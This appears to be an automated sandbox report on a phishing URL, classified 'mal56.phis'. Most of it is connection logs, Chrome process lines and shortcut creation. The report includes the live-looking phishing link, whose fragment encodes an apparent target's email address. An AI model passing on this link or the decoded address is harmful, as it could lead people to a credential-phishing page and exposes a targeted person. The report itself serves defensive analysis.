Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60680
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 60734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60739
Source: unknown	Network traffic detected: HTTP traffic on port 60702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60737
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60735
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60734
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60748
Source: unknown	Network traffic detected: HTTP traffic on port 60719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60744
Source: unknown	Network traffic detected: HTTP traffic on port 60736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60752
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60755
Source: unknown	Network traffic detected: HTTP traffic on port 60718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60753
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 60707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 60713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 60726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60670 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 60681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60709
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60706
Source: unknown	Network traffic detected: HTTP traffic on port 60675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60669 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60705
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60700
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60717
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60716
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60710
Source: unknown	Network traffic detected: HTTP traffic on port 60737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60728
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60722
Source: unknown	Network traffic detected: HTTP traffic on port 60751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60695
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60693
Source: unknown	Network traffic detected: HTTP traffic on port 60674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60690
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60699
Source: unknown	Network traffic detected: HTTP traffic on port 60739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60667 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60755 -> 443

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:60695 version: TLS 1.2

Source: classification engine

Classification label: mal56.phis.win@33/87@42/13

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1912,i,16068563968825472916,3596448657120280813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1912,i,16068563968825472916,3596448657120280813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

ID:	1541474
Product:	CloudBasic
Start time:	21:43:06
Start date:	24.10.2024
Cookbook:	defaultwindowsinteractivecookbook.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS

Windows Analysis Report
https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Boot Survival

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Boot Survival

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t